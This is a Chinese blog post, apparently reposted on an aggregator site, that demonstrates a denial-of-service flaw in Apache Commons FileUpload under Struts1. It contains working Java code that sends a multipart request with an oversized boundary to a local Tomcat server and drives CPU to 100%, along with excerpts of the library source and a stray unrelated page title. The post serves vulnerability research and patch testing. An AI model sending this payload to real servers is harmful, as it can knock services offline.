标签:fileupload dos攻击
注:本文仅供技术探讨, 研究,测试使用。最近因为在修补struts1的可操纵classLoader的漏洞(struts2也有该漏洞, 不在本文讨论范围), 所以我就在我建立的struts1的项目上直接做测试,怎么创建struts1的项目不在本文讨论范围之列你可以在这里下载struts1样例程序(http://download.csdn.net/detail/sunxing007/7350433)。 只需要建立一个最简单的hello world的struts1程序即可。然后启动tomcat并部署项目。
然后用apache http component 组件写一个程序来发起一个“带特制的包含畸形header的http请求” 关键代码如下(在下载的附件中有HttpUtil.java包含完整的代码):
public static void testCommonFileUploadVelnerability() throws ClientProtocolException, IOException{ CloseableHttpClient httpClient = createHttpClient(); HttpPost post = new HttpPost("http://localhost:8080/Struts1/helloWorld.do"); String boundary = ""; for(int i=0; i<4092; i++){ boundary += "a"; } post.setHeader("Content-Type", "multipart/form-data; boundary=#{" + boundary + "}"); post.setHeader("lf-None-Match","59e532f501ac13174dd9c488f897ee75"); String body = ""; for(int i=0; i<4097; i++){ body +="b"; } post.setEntity(new StringEntity(body)); CloseableHttpResponse response = httpClient.execute(post, DEFAULT_CONTEXT); HttpEntity entity = response.getEntity(); System.out.println(EntityUtils.toString(entity)); System.out.println("Over!"); }运行该程序, 你会发现该程序无法返回, 打开任务管理器,会发现CPU使用率为100%; 关闭tomcat后 CPU的使用率马上降到正常水平。
try { multi = new MultipartStream(input, boundary, notifier); } catch (IllegalArgumentException iae) { throw new InvalidContentTypeException( format("The boundary specified in the %s header is too long", CONTENT_TYPE), iae); }
public MultipartStream(InputStream input, byte[] boundary, int bufSize, ProgressNotifier pNotifier) { if (boundary == null) { throw new IllegalArgumentException("boundary may not be null"); } this.input = input; this.bufSize = bufSize; this.buffer = new byte[bufSize]; this.notifier = pNotifier; // We prepend CR/LF to the boundary to chop trailing CR/LF from // body-data tokens. this.boundaryLength = boundary.length + BOUNDARY_PREFIX.length; if (bufSize < this.boundaryLength + 1) { throw new IllegalArgumentException( "The buffer size specified for the MultipartStream is too small"); } this.boundary = new byte[this.boundaryLength]; this.keepRegion = this.boundary.length; System.arraycopy(BOUNDARY_PREFIX, 0, this.boundary, 0, BOUNDARY_PREFIX.length); System.arraycopy(boundary, 0, this.boundary, BOUNDARY_PREFIX.length, boundary.length); head = 0; tail = 0; }
leetcode第一刷_Word Ladder II,布布扣,bubuko.com
标签:fileupload dos攻击
原文地址:http://blog.csdn.net/u012792219/article/details/25881407